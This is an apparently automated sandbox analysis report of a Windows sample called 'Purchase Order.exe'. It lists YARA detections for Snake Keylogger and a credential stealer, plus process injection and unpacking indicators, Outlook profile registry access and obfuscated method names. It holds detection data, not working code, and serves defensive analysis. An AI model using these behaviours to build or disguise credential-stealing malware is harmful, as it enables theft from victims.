            Source: 0.2.Purchase Order.exe.456bca8.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.Purchase Order.exe.456bca8.9.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.Purchase Order.exe.456bca8.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.Purchase Order.exe.456bca8.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.Purchase Order.exe.454b488.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.Purchase Order.exe.454b488.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.Purchase Order.exe.454b488.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.Purchase Order.exe.454b488.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 2.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 2.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 2.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 2.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.Purchase Order.exe.456bca8.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.Purchase Order.exe.456bca8.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.Purchase Order.exe.456bca8.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.Purchase Order.exe.454b488.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.Purchase Order.exe.454b488.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.Purchase Order.exe.454b488.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000002.00000002.4123792564.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000002.00000002.4123792564.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000000.00000002.1733547969.000000000447E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000000.00000002.1733547969.000000000447E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: Purchase Order.exe PID: 6576, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: Purchase Order.exe PID: 6576, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: Purchase Order.exe PID: 7048, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: Purchase Order.exe PID: 7048, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Purchase Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.Purchase Order.exe.454b488.7.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Purchase Order.exe.454b488.7.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Purchase Order.exe.454b488.7.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Purchase Order.exe.454b488.7.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Purchase Order.exe.456bca8.9.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Purchase Order.exe.456bca8.9.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Purchase Order.exe.456bca8.9.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Purchase Order.exe.456bca8.9.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, mpRvKO3JoGJC6tKJYH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, c0JmJwYlJqYd0MoW5e.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, c0JmJwYlJqYd0MoW5e.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, c0JmJwYlJqYd0MoW5e.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, mpRvKO3JoGJC6tKJYH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, c0JmJwYlJqYd0MoW5e.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, c0JmJwYlJqYd0MoW5e.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, c0JmJwYlJqYd0MoW5e.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Purchase Order.exe.332a1e8.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.Purchase Order.exe.7aa0000.11.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.Purchase Order.exe.32e29bc.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.Purchase Order.exe.32da9a4.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@4/4
            Source: C:\Users\user\Desktop\Purchase Order.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order.exe.logJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMutant created: NULL
            Source: Purchase Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Purchase Order.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\Purchase Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Purchase Order.exe, 00000002.00000002.4124971142.000000000346B000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.000000000344D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.000000000345D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Purchase Order.exeReversingLabs: Detection: 23%
            Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Purchase Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Purchase Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: cJZX.pdb source: Purchase Order.exe
            Source: Binary string: cJZX.pdbSHA256 source: Purchase Order.exe

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: Purchase Order.exe, SuperAdventure.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, c0JmJwYlJqYd0MoW5e.cs.Net Code: PhkB3pOlFx System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, c0JmJwYlJqYd0MoW5e.cs.Net Code: PhkB3pOlFx System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Purchase Order.exe.7a90000.10.raw.unpack, nL.cs.Net Code: sf
            Source: 0.2.Purchase Order.exe.7a90000.10.raw.unpack, nL.cs.Net Code: wb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Purchase Order.exe.32c4454.4.raw.unpack, nL.cs.Net Code: sf
            Source: 0.2.Purchase Order.exe.32c4454.4.raw.unpack, nL.cs.Net Code: wb System.Reflection.Assembly.Load(byte[])
            Source: Purchase Order.exeStatic PE information: 0xB2AFCB55 [Tue Dec 30 12:21:41 2064 UTC]
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_01909C20 push EC032893h; iretd 0_2_01909C6D
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_01909C40 push EC032893h; iretd 0_2_01909C6D
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_094B42A5 push ebx; ret 0_2_094B42DA
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_01669770 push esp; ret 2_2_01669771
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DB234A push edx; ret 2_2_05DB234B
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9F0B7 push es; ret 2_2_06E9F0B8
            Source: Purchase Order.exeStatic PE information: section name: .text entropy: 7.9495035633914695
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, wrjYe5aToKpciW2VfH.csHigh entropy of concatenated method names: 'EBMb7ScU39', 'bbCb9jO5m8', 'Te8bdedRkb', 'xy8dyaIS7A', 'brAdzEcot5', 'P0LbXIF522', 'GASb4gSYUS', 'OclbKY9f6o', 'Kihbe5ho3V', 'c1hbB5X595'
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, NHGqHVrOEDDV6G4stpo.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JkDQ27KRds', 'M8wQr19Ul7', 'Bj2Qi9FMuP', 'bccQtwTJmW', 'lSyQLTZqsF', 'H0HQA4uiPF', 'BCGQMCHg8i'
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, Y3KDGAssWSf8Mg3VOY.csHigh entropy of concatenated method names: 'lKhwTiVeqm', 'z9nwDi6HkO', 'NmkwvjcSe4', 'kQHwjuxCLp', 'PWgwo2txew', 'V0bwC4vIa5', 'agWwVWXd6n', 'AnSwJ1QZiJ', 'wFwwWhLS5K', 'Y9twmxuOO6'
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, iq0X4uXRxp1wMvJwdA.csHigh entropy of concatenated method names: 'SNGcEmv4i9', 'nVXcyPJiWj', 'igaUXuWbKu', 'dAAU4842jJ', 'Fyycma37HW', 'SkRcIHSufC', 'Ws9caR8tTw', 'fsUc25PQiR', 'BZrcrKEi3j', 'mQ8ciNnv7J'
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, cJTndOryL0Vy6OYifgE.csHigh entropy of concatenated method names: 'gbnGZWPh9X', 'P98Gx2Kv8L', 'V7UG3H6Y7p', 'SOlGgoHx8l', 'mOiGppNCtd', 'XBHG6TyGlA', 'zYEGu8M0dj', 'Ur0GTKC7x2', 'csCGDtIOxN', 'AruGsJDCg5'
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, BOwi3dP3N9vwTmlkGN.csHigh entropy of concatenated method names: 'ToString', 'fhASmh7TUP', 'Lq1SjnwUFt', 'hx4SNJIZiN', 'CXoSoQiumQ', 'AbbSC9jBI2', 'H9LS89DZMp', 'AZkSVqeF5H', 'tfRSJZ9n1B', 'T7FSRx4JZ6'
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, WJhonTxgluihCS0u13.csHigh entropy of concatenated method names: 'Dispose', 'hX14OKJux8', 'CKVKj9gAOk', 'UP155T5uYC', 'BED4yEln8a', 'pr74zk0xwq', 'ProcessDialogKey', 'NnSKXnYhrq', 'NU8K4DJb3Y', 'wVuKKmVlXH'
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, DpreMYHmaBqn0L0Z6p.csHigh entropy of concatenated method names: 'ib5U7mJcCC', 'uoXUYvNHBn', 'BdFU9Q5PRd', 'POlUPI1G1R', 'hXgUdbEi2X', 'LVZUb9okNw', 'xcmUFBtBTj', 'JQvUnVvBie', 'yr4UhmZOux', 'OM7UkGJRfD'
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, BpsKu276sb2hDS0pUd.csHigh entropy of concatenated method names: 'Lxf4bsO19y', 'CUZ4FD5w9a', 'rMi4hG2pHr', 'rcf4kOJgPi', 'XoY4HdsqoB', 'x794SUMgUX', 'WyMSN97CT6o98OugbX', 'KFIKhSo01BmSEc8Xqr', 'mQO44BcXuh', 'gwp4eNyBtS'
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, sBf3YAfjRhwJxnTqDI.csHigh entropy of concatenated method names: 'iZv3IVRl9', 'hjugBkJ4Z', 'HHZ6tWnqj', 'TcHu4KQ29', 'VjCDfceo9', 'k4GsiK7U6', 'trrCZ8EyycApsMxAun', 'TVISJ2HWujYsW9hbQ4', 'fQuUljS6E', 'HvCQvXmjL'
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, MTWMUYtX3CayUFNpHW.csHigh entropy of concatenated method names: 'd7FdlDtrLd', 'meRdYgn7Eh', 'bDJdP5PJ6s', 'WowdbJZZco', 'vIvdFVNk4J', 'p8QPLALpex', 'evQPAdtBT3', 'Nl2PMtOlUt', 'kVGPEGyjY4', 'GpqPOM1A5Y'
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, c0JmJwYlJqYd0MoW5e.csHigh entropy of concatenated method names: 'yUMelRu6y8', 'qJMe7gPiPF', 'fMheYwycph', 'RQNe98Rmnx', 'PfYePdX3FA', 'dEAedaX4mZ', 'DHVeb8pGrC', 'ERAeFUxEqf', 'm6Xenw0VGQ', 'SdkehE6i0q'
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, xIP7IyRvvhY4aieuRp.csHigh entropy of concatenated method names: 'ixxchxGPlm', 'S2HckqEuHx', 'ToString', 'HlNc7ges59', 'kPtcYnuTkM', 'ddHc9hEnA2', 'SxbcPuc3bB', 'B8Pcdf67GO', 'Tm5cbVtfXX', 'YUtcFVcZA9'
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, pUZuqtnGEFgUxGMRtR.csHigh entropy of concatenated method names: 'UyAd1oZii3', 'UnXdZ6PPR8', 'QMDd3h47SW', 'j47dg37Sih', 'iXkd6hVqNt', 'nG8duMwKZO', 'fD8dDciuy0', 'LrCdsxut24', 'sQZBsFYjeGyvE6Ite9a', 'Xy8hNSYcKo1NsImgSfy'
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, s4X4LuFEvtddWivXUm.csHigh entropy of concatenated method names: 'ikr9gMUsHu', 'CLh96OwPIM', 'lKu9TXC1kF', 'kDv9DYCeSs', 'WT09HU0mLv', 'Wto9S17Sjx', 'Ly29c6veP0', 'exU9UVIqUE', 'gDN9GGZSxy', 'o3d9QmDNdS'
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, KoHwCn0VAavRpE54m8.csHigh entropy of concatenated method names: 'uCNbZYRVwf', 'IvSbx8ryjb', 'Frnb3DQPML', 'SPBbgRYCAm', 'l6Jbp5bHBp', 'Hagb60sbMx', 'hywbu0ogv5', 'QVebTbplEc', 'LKwbD2DEvE', 'xn2bs6G7dv'
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, w3irh0dMbfWIaWLdDO.csHigh entropy of concatenated method names: 'wyVHWWPX6s', 'TMnHIykAdB', 'Rd5H2ogOCS', 'PVtHrQrgZv', 'CFRHjhDNeO', 'xt8HN9VfVc', 'DL6HoHDokw', 'x97HC0A7WL', 'gbfH8MGKip', 'R4DHVqp2Lo'
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, KUgFQ4WTCrKXUfgMW7.csHigh entropy of concatenated method names: 'kQTPpnMGGn', 'fXxPu3yAfF', 'OuT9Nigg4u', 'dXB9oEKhTg', 'GE29CxjBeI', 'Jrh98YEdun', 'igi9VyBCKi', 'yu99J30pBl', 'csL9RUTTXU', 'uZf9WlCUa8'
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, LkDy48btoEH441yn35.csHigh entropy of concatenated method names: 'GVhG4XPKcd', 'nC0GeyxxJY', 'mn9GBp0rSF', 'RQUG7whgj1', 'mO9GYB0DdR', 'MieGPI8ImV', 'v7pGdJlrTy', 'SvuUMro70m', 'WVCUEncf10', 'tS9UOFs5DM'
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, WDV5NXzgCgmgNMVA8V.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xMLGwUZHZ6', 'MnkGHDeGWo', 'c1rGSEpvi6', 'T9WGckULIc', 'zgTGUp9F6X', 'EoEGGx5P2a', 'pSxGQTNYu8'
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, ftWhWilFvs26U0HpnX.csHigh entropy of concatenated method names: 'gOwUv6Q1wo', 'UOvUj61hAC', 'p6CUNPcgji', 'gGjUoZu73Q', 'KkWU26mTB3', 'b7jUCRPWam', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Purchase Order.exe.94c0000.12.raw.unpack, mpRvKO3JoGJC6tKJYH.csHigh entropy of concatenated method names: 'YHQY2Hy7uo', 'oDlYr4GyHe', 'TZFYi7p5BN', 'GDSYtIcSl1', 'GthYLBG39H', 'cOoYAaNEa4', 'egsYMT8LVo', 'CIrYEBdp2I', 'psbYO5YK91', 'xheYyrfKik'
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, wrjYe5aToKpciW2VfH.csHigh entropy of concatenated method names: 'EBMb7ScU39', 'bbCb9jO5m8', 'Te8bdedRkb', 'xy8dyaIS7A', 'brAdzEcot5', 'P0LbXIF522', 'GASb4gSYUS', 'OclbKY9f6o', 'Kihbe5ho3V', 'c1hbB5X595'
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, NHGqHVrOEDDV6G4stpo.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JkDQ27KRds', 'M8wQr19Ul7', 'Bj2Qi9FMuP', 'bccQtwTJmW', 'lSyQLTZqsF', 'H0HQA4uiPF', 'BCGQMCHg8i'
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, Y3KDGAssWSf8Mg3VOY.csHigh entropy of concatenated method names: 'lKhwTiVeqm', 'z9nwDi6HkO', 'NmkwvjcSe4', 'kQHwjuxCLp', 'PWgwo2txew', 'V0bwC4vIa5', 'agWwVWXd6n', 'AnSwJ1QZiJ', 'wFwwWhLS5K', 'Y9twmxuOO6'
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, iq0X4uXRxp1wMvJwdA.csHigh entropy of concatenated method names: 'SNGcEmv4i9', 'nVXcyPJiWj', 'igaUXuWbKu', 'dAAU4842jJ', 'Fyycma37HW', 'SkRcIHSufC', 'Ws9caR8tTw', 'fsUc25PQiR', 'BZrcrKEi3j', 'mQ8ciNnv7J'
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, cJTndOryL0Vy6OYifgE.csHigh entropy of concatenated method names: 'gbnGZWPh9X', 'P98Gx2Kv8L', 'V7UG3H6Y7p', 'SOlGgoHx8l', 'mOiGppNCtd', 'XBHG6TyGlA', 'zYEGu8M0dj', 'Ur0GTKC7x2', 'csCGDtIOxN', 'AruGsJDCg5'
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, BOwi3dP3N9vwTmlkGN.csHigh entropy of concatenated method names: 'ToString', 'fhASmh7TUP', 'Lq1SjnwUFt', 'hx4SNJIZiN', 'CXoSoQiumQ', 'AbbSC9jBI2', 'H9LS89DZMp', 'AZkSVqeF5H', 'tfRSJZ9n1B', 'T7FSRx4JZ6'
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, WJhonTxgluihCS0u13.csHigh entropy of concatenated method names: 'Dispose', 'hX14OKJux8', 'CKVKj9gAOk', 'UP155T5uYC', 'BED4yEln8a', 'pr74zk0xwq', 'ProcessDialogKey', 'NnSKXnYhrq', 'NU8K4DJb3Y', 'wVuKKmVlXH'
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, DpreMYHmaBqn0L0Z6p.csHigh entropy of concatenated method names: 'ib5U7mJcCC', 'uoXUYvNHBn', 'BdFU9Q5PRd', 'POlUPI1G1R', 'hXgUdbEi2X', 'LVZUb9okNw', 'xcmUFBtBTj', 'JQvUnVvBie', 'yr4UhmZOux', 'OM7UkGJRfD'
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, BpsKu276sb2hDS0pUd.csHigh entropy of concatenated method names: 'Lxf4bsO19y', 'CUZ4FD5w9a', 'rMi4hG2pHr', 'rcf4kOJgPi', 'XoY4HdsqoB', 'x794SUMgUX', 'WyMSN97CT6o98OugbX', 'KFIKhSo01BmSEc8Xqr', 'mQO44BcXuh', 'gwp4eNyBtS'
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, sBf3YAfjRhwJxnTqDI.csHigh entropy of concatenated method names: 'iZv3IVRl9', 'hjugBkJ4Z', 'HHZ6tWnqj', 'TcHu4KQ29', 'VjCDfceo9', 'k4GsiK7U6', 'trrCZ8EyycApsMxAun', 'TVISJ2HWujYsW9hbQ4', 'fQuUljS6E', 'HvCQvXmjL'
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, MTWMUYtX3CayUFNpHW.csHigh entropy of concatenated method names: 'd7FdlDtrLd', 'meRdYgn7Eh', 'bDJdP5PJ6s', 'WowdbJZZco', 'vIvdFVNk4J', 'p8QPLALpex', 'evQPAdtBT3', 'Nl2PMtOlUt', 'kVGPEGyjY4', 'GpqPOM1A5Y'
            Source: 0.2.Purchase Order.exe.45b6b20.8.raw.unpack, c0JmJwYlJqYd0MoW5e.csHigh entropy of concatenated method names: 'yUMelRu6y8', 'qJMe7gPiPF', 'fMheYwycph', 'RQNe98Rmnx', 'PfYePdX3FA', 'dEAedaX4mZ', 'DHVeb8pGrC', 'ERAeFUxEqf', 'm6Xenw0VGQ', 'SdkehE6i0q'
